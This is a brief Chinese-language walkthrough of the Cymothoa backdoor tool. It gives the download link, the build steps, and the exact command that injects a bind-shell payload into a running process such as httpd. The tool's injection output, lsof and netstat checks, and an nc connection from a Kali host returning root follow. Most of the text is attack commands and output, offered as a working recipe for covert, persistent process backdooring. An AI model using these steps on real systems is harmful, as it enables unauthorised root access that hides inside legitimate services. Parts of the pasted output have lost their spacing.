下载:https://sourceforge.net/projects/cymothoa/files/
测试环境:
32位环境下可以编译成功
[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
64位环境下编译报错
后门注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限,当然进程重启或者挂了也就没了
[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]#./cymothoa -p 3055-s 0-y 4444//3055为要注入进程的进程号
[+] attaching to process 3055
register info:
-----------------------------------------------------------
eax value:0xfffffffc ebx value:0x9c44400
esp value:0xbf9fc434 eip value:0x51c402
------------------------------------------------------------
[+]new esp:0xbf9fc430
[+] injecting code into0x008c1000
[+] copy general purpose registers
[+] detaching from3055
[+] infected!!!
比如注入到httpd进程中,然后nc连接
[root@localhost mafix]# netstat -ano | grep 8888
tcp 000.0.0.0:88880.0.0.0:* LISTEN off (0.00/0/0)
[root@localhost mafix]# lsof -i:8888
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sh 15575 root 0uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)
sh 15575 root 1uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)
sh 15575 root 2uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)
sh 15575 root 10uIPv455603 TCP *:ddi-tcp-1(LISTEN)
sh 15575 root 11uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)
[root@localhost mafix]# ps axu | grep 15575| grep -v grep
root 155750.00.02556984? S 21:590:00/bin//sh
root@kali-vincent:~# nc -vv 172.16.100.1568888
172.16.100.156: inverse host lookup failed:Unknown host
(UNKNOWN)[172.16.100.156]8888(?) open
whoami
root